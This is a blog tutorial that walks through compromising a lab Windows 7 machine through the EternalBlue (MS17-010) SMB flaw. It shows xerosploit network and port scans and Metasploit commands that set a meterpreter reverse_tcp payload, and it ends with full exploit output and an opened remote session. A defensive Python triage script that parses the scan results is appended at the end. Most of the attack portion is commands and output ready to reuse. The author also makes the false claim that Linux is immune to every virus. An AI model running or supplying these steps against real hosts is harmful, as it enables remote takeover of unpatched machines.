Using the EternalBlue (MS17-010) vulnerability to compromise Windows 7

EternalBlue introduction

A few days ago the WannaCry ransomware was all over everyone's feeds. This virus made people realize how important it is to back up your files. Of course, I'm not afraid of any virus, because I back up my files once a day: one copy on Weiyun, one on Nutstore (坚果云) and one on an external hard drive. Even if I got hacked, so what; at most I'd spend a day reinstalling and configuring the system. Besides, I don't use garbage Windows; Linux is immune to every virus, and my system is updated every day. So half the reason people get hacked is simply a lack of awareness: it's 2017 and you still keep your files on your local hard drive, what are you thinking? Mother Fuck. Anyway, I've wandered off topic. WannaCry exploits the EternalBlue vulnerability, so as long as you don't turn on LAN network sharing, that is, as long as you don't expose port 445, none of this concerns you.

By the way, a word about WannaCry's Chinese localization: damn, it's really thoughtful, arguably the best localized program of 2017. If the companies making Steam games worked with the mindset of virus authors, would they still have to fear negative reviews from Chinese players? Not a chance.

Penetration test lab setup

First install an x64 Windows 7 virtual machine, then follow the steps below to turn on network sharing. Open File Explorer -> Network, then:

Click the bar that reads "Network discovery and file sharing are turned off..."

Click "Turn on network discovery and file sharing"

Click "Yes"

When you see the screen above, it worked. Note that the VM's network should preferably be bridged. After that you can ignore this VM; just leave it running.

Starting the attack

First update Metasploit with msfupdate. Note that the latest version prints "msfupdate is no longer supported when Metasploit is part of the operating system. Please use 'apt update; apt install metasploit-framework'". It doesn't matter; running apt update && apt install metasploit-framework to update the system works just as well. Then scan the LAN for machines. I like to use xerosploit for scanning the LAN because it's convenient; if you don't know how to install and use it, see my blog post http://www.bboysoul.cn/2017/07/01/%E4%B8%AD%E9%97%B4%E4%BA%BA%E6%94%BB%E5%87%BB%E5%B7%A5%E5%85%B7(Xerosploit)/ . The procedure is shown below.

root@kali:~# xerosploit


██╗  ██╗███████╗██████╗  ██████╗ ███████╗██████╗ ██╗      ██████╗ ██╗████████╗
╚██╗██╔╝██╔════╝██╔══██╗██╔═══██╗██╔════╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
 ╚███╔╝ █████╗  ██████╔╝██║   ██║███████╗██████╔╝██║     ██║   ██║██║   ██║   
 ██╔██╗ ██╔══╝  ██╔══██╗██║   ██║╚════██║██╔═══╝ ██║     ██║   ██║██║   ██║   
██╔╝ ██╗███████╗██║  ██║╚██████╔╝███████║██║     ███████╗╚██████╔╝██║   ██║   
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝ ╚══════╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝                                                      


[+]═══════════[ Author : @LionSec1 _-\|/-_ Website: lionsec.net ]═══════════[+]

                      [ Powered by Bettercap and Nmap ]
 
┌═════════════════════════════════════════════════════════════════════════════┐
█                                                                             █
█                         Your Network Configuration                          █ 
█                                                                             █
└═════════════════════════════════════════════════════════════════════════════┘     
 
╒═══════════════╤═══════════════════╤═════════════╤═════════╤════════════╕
│  IP Address   │    MAC Address    │   Gateway   │  Iface  │  Hostname  │
╞═══════════════╪═══════════════════╪═════════════╪═════════╪════════════╡
│               │                   │             │         │            │
├───────────────┼───────────────────┼─────────────┼─────────┼────────────┤
│ 192.168.1.106 │ 08:00:27:7B:3D:E7 │ 192.168.1.1 │  eth0   │    kali    │
╘═══════════════╧═══════════════════╧═════════════╧═════════╧════════════╛

╔═════════════╦════════════════════════════════════════════════════════════════════╗
║             ║ XeroSploit is a penetration testing toolkit whose goal is to       ║
║ Information ║ perform man in the middle attacks for testing purposes.            ║
║             ║ It brings various modules that allow to realise efficient attacks. ║
║             ║ This tool is Powered by Bettercap and Nmap.                        ║
╚═════════════╩════════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮ scan

[++] Mapping your network ... 

[+]═══════════[ Devices found on your network ]═══════════[+]

╔═══════════════╦═══════════════════╦════════════════════════════════╗
║ IP Address    ║ Mac Address       ║ Manufacturer                   ║
╠═══════════════╬═══════════════════╬════════════════════════════════╣
║ 192.168.1.1   ║ 6C:59:40:EB:2C:E4 ║ (Shenzhen MercuryCommunication ║
║ 192.168.1.100 ║ B8:27:EB:CE:05:C6 ║ (Raspberry PiFoundation)       ║
║ 192.168.1.105 ║ 7C:DD:90:DE:A1:34 ║ (Shenzhen OgemrayTechnology)   ║
║ 192.168.1.107 ║ 08:00:27:B3:74:87 ║ (Oracle VirtualBoxvirtual      ║
║ 192.168.1.106 ║ 08:00:27:7B:3D:E7 ║ (This device)                  ║
║               ║                   ║                                ║
╚═══════════════╩═══════════════════╩════════════════════════════════╝

[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.

Xero ➮ 192.168.1.107

[++] 192.168.1.107 has been targeted. 

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮ pscan
 
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                         Port Scanner                         █
█                                                              █
█      Find open ports on network computers and retrieve       █
█     versions of programs running on the detected ports       █
└══════════════════════════════════════════════════════════════┘     

[+] Enter 'run' to execute the 'pscan' command.

Xero»modules»pscan ➮ run

[++] Please wait ... Scanning ports on 192.168.1.107 

[+]═════════[ Port scan result for 192.168.1.107 ]═════════[+]

╔══════════════╦══════════╦═══════╗
║ SERVICE      ║ PORT     ║ STATE ║
╠══════════════╬══════════╬═══════╣
║ MSRPC        ║ 135/TCP  ║ OPEN  ║
║ NETBIOS-SSN  ║ 139/TCP  ║ OPEN  ║
║ MICROSOFT-DS ║ 445/TCP  ║ OPEN  ║
║ WSDAPI       ║ 5357/TCP ║ OPEN  ║
║              ║          ║       ║
╚══════════════╩══════════╩═══════╝

[+] Enter 'run' to execute the 'pscan' command.

Xero»modules»pscan ➮ 

From the scan there are 5 machines on the LAN: the first is my router, the second is my Raspberry Pi, the third is my main computer, the fourth is the Windows 7 VM and the fifth is my Kali VM. Scanning the Windows 7 VM confirms that port 445 is open. Then open Metasploit to attack; the procedure is shown below.

root@kali:~# msfconsole
                                                  

                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .


       =[ metasploit v4.14.27-dev                         ]
+ -- --=[ 1659 exploits - 951 auxiliary - 293 post        ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search ms17-010
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                      Disclosure Date  Rank     Description
   ----                                      ---------------  ----     -----------
   auxiliary/scanner/smb/smb_ms17_010                         normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption


msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.107
rhosts => 192.168.1.107
msf auxiliary(smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.1.107    yes       The target address range or CIDR identifier
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_ms17_010) > run

[+] 192.168.1.107:445     - Host is likely VULNERABLE to MS17-010!  (Windows 7 Ultimate 7601 Service Pack 1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.107
rhost => 192.168.1.107
msf exploit(ms17_010_eternalblue) > set payload windows/x64/
set payload windows/x64/exec                            set payload windows/x64/meterpreter/reverse_winhttps    set payload windows/x64/vncinject/bind_ipv6_tcp
set payload windows/x64/loadlibrary                     set payload windows/x64/powershell_bind_tcp             set payload windows/x64/vncinject/bind_ipv6_tcp_uuid
set payload windows/x64/meterpreter/bind_ipv6_tcp       set payload windows/x64/powershell_reverse_tcp          set payload windows/x64/vncinject/bind_tcp
set payload windows/x64/meterpreter/bind_ipv6_tcp_uuid  set payload windows/x64/shell/bind_ipv6_tcp             set payload windows/x64/vncinject/bind_tcp_uuid
set payload windows/x64/meterpreter/bind_tcp            set payload windows/x64/shell/bind_ipv6_tcp_uuid        set payload windows/x64/vncinject/reverse_http
set payload windows/x64/meterpreter/bind_tcp_uuid       set payload windows/x64/shell/bind_tcp                  set payload windows/x64/vncinject/reverse_https
set payload windows/x64/meterpreter/reverse_http        set payload windows/x64/shell/bind_tcp_uuid             set payload windows/x64/vncinject/reverse_tcp
set payload windows/x64/meterpreter/reverse_https       set payload windows/x64/shell/reverse_tcp               set payload windows/x64/vncinject/reverse_tcp_uuid
set payload windows/x64/meterpreter/reverse_tcp         set payload windows/x64/shell/reverse_tcp_uuid          set payload windows/x64/vncinject/reverse_winhttp
set payload windows/x64/meterpreter/reverse_tcp_uuid    set payload windows/x64/shell_bind_tcp                  set payload windows/x64/vncinject/reverse_winhttps
set payload windows/x64/meterpreter/reverse_winhttp     set payload windows/x64/shell_reverse_tcp               
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.1.107    yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > ifconfig
[*] exec: ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.106  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::a00:27ff:fe7b:3de7  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:7b:3d:e7  txqueuelen 1000  (Ethernet)
        RX packets 4305  bytes 483899 (472.5 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 11338  bytes 2843116 (2.7 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 8  bytes 396 (396.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8  bytes 396 (396.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.106
lhost => 192.168.1.106
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.1.107    yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.106    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.106:4444 
[*] 192.168.1.107:445 - Connecting to target for exploitation.
[+] 192.168.1.107:445 - Connection established for exploitation.
[+] 192.168.1.107:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.107:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.1.107:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.1.107:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 192.168.1.107:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          
[+] 192.168.1.107:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.107:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.107:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.107:445 - Starting non-paged pool grooming
[+] 192.168.1.107:445 - Sending SMBv2 buffers
[+] 192.168.1.107:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.107:445 - Sending final SMBv2 buffers.
[*] 192.168.1.107:445 - Sending last fragment of exploit packet!
[*] 192.168.1.107:445 - Receiving response from exploit packet
[+] 192.168.1.107:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.107:445 - Sending egg to corrupted connection.
[*] 192.168.1.107:445 - Triggering free of corrupted buffer.
[*] Sending stage (1189423 bytes) to 192.168.1.107
[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.107:49159) at 2017-07-02 04:15:38 -0400
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > 

First I opened Metasploit and searched it for anything related to ms17-010; there is one auxiliary module and one exploit module. I used the auxiliary module to check whether this Windows 7 machine has the ms17-010 vulnerability. The line [+] 192.168.1.107:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1) means the target system has the vulnerability. Then I switched to the exploit module, loaded a backdoor payload, set the target IP and the local IP the payload needs, ran exploit, and got a session.

Note that this exploit module and payload only work on x64 systems.

Have fun
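The port scan table and the smb_ms17_010 scanner line above are exactly what a defender collects when auditing a LAN for this exposure. The script below, an added example that is not part of the original post and not code from Metasploit or xerosploit, parses both outputs into a per-host triage report: which hosts expose SMB (TCP 139/445), which the scanner flagged as likely vulnerable to MS17-010, and what to do about each. The pscan table and the first scanner line are copied from the post; the second scanner line, for a host that is not vulnerable, is constructed so that the report shows both outcomes. The HostFinding class and the action text are my own conventions.

```python
"""Turn xerosploit 'pscan' output and Metasploit smb_ms17_010 scanner output
into a patch/exposure triage report. Added example; not from the original
post, Metasploit or xerosploit. Sample inputs are copied/constructed below."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

SMB_PORTS = {139, 445}  # ports WannaCry/EternalBlue reach SMB through

# Sample pscan output, copied from the post above (one host).
PSCAN_OUTPUT = """
[+]═════════[ Port scan result for 192.168.1.107 ]═════════[+]

╔══════════════╦══════════╦═══════╗
║ SERVICE      ║ PORT     ║ STATE ║
╠══════════════╬══════════╬═══════╣
║ MSRPC        ║ 135/TCP  ║ OPEN  ║
║ NETBIOS-SSN  ║ 139/TCP  ║ OPEN  ║
║ MICROSOFT-DS ║ 445/TCP  ║ OPEN  ║
║ WSDAPI       ║ 5357/TCP ║ OPEN  ║
║              ║          ║       ║
╚══════════════╩══════════╩═══════╝
"""

# Sample smb_ms17_010 output: first line copied from the post, second line
# constructed to show a host the scanner did not flag.
MSF_OUTPUT = """
[+] 192.168.1.107:445     - Host is likely VULNERABLE to MS17-010!  (Windows 7 Ultimate 7601 Service Pack 1)
[-] 192.168.1.100:445     - Host does NOT appear vulnerable.
[*] Scanned 2 of 2 hosts (100% complete)
"""

HOST_RE = re.compile(r"Port scan result for (\S+)\s*\]")
ROW_RE = re.compile(r"^║\s*(\S+)\s+║\s*(\d+)/(\w+)\s*║\s*(\w+)\s*║")
VULN_RE = re.compile(
    r"^\[\+\]\s+(\S+):(\d+)\s+-\s+Host is likely VULNERABLE to MS17-010!\s*(?:\((.*?)\))?")
NOTVULN_RE = re.compile(r"^\[-\]\s+(\S+):(\d+)\s+-\s+Host does NOT appear vulnerable")


@dataclass
class HostFinding:
    host: str
    open_ports: List[Tuple[int, str, str]] = field(default_factory=list)  # (port, proto, service)
    smb_exposed: bool = False
    ms17_010: Optional[bool] = None  # None means the scanner did not report on this host
    os_banner: Optional[str] = None

    @property
    def action(self) -> str:
        """Defender's next step, derived from the two observations."""
        if self.ms17_010:
            return "CRITICAL: apply the MS17-010 update, disable SMBv1, block TCP 445 from untrusted networks"
        if self.smb_exposed:
            return "REVIEW: SMB is reachable; confirm patch level and whether sharing is actually needed"
        return "OK: no SMB exposure observed"


def parse_pscan(text: str) -> Dict[str, List[Tuple[int, str, str]]]:
    """Map host -> list of OPEN (port, proto, service) rows from one or more pscan tables."""
    result: Dict[str, List[Tuple[int, str, str]]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.search(line)
        if m:
            current = m.group(1)
            result.setdefault(current, [])
            continue
        m = ROW_RE.match(line)
        if m and current and m.group(4).upper() == "OPEN":
            result[current].append((int(m.group(2)), m.group(3).upper(), m.group(1)))
    return result


def parse_ms17_010(text: str) -> Dict[str, Tuple[bool, Optional[str]]]:
    """Map host -> (likely_vulnerable, os_banner) from smb_ms17_010 scanner lines."""
    result: Dict[str, Tuple[bool, Optional[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        m = VULN_RE.match(line)
        if m:
            result[m.group(1)] = (True, m.group(3))
            continue
        m = NOTVULN_RE.match(line)
        if m:
            result[m.group(1)] = (False, None)
    return result


def triage(pscan_text: str, msf_text: str) -> Dict[str, HostFinding]:
    """Merge both scan outputs into one finding per host."""
    findings: Dict[str, HostFinding] = {}
    for host, ports in parse_pscan(pscan_text).items():
        f = findings.setdefault(host, HostFinding(host))
        f.open_ports = ports
        f.smb_exposed = any(port in SMB_PORTS and proto == "TCP" for port, proto, _ in ports)
    for host, (vuln, banner) in parse_ms17_010(msf_text).items():
        f = findings.setdefault(host, HostFinding(host))
        f.ms17_010 = vuln
        f.os_banner = banner
    return findings


if __name__ == "__main__":
    for host, f in sorted(triage(PSCAN_OUTPUT, MSF_OUTPUT).items()):
        ports = ", ".join(f"{p}/{pr}" for p, pr, _ in f.open_ports) or "(not port-scanned)"
        print(f"{host:15} smb_exposed={f.smb_exposed!s:5} ms17_010={f.ms17_010!s:5} "
              f"os={f.os_banner or '-'}\n    ports: {ports}\n    {f.action}")
```

Feed it the saved output of your own scans (for example via spool in msfconsole) instead of the embedded samples; the regexes only need the scanner's "[+] host:port - Host is likely VULNERABLE" and "[-] ... does NOT appear vulnerable" line shapes and the pscan box-drawing rows.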
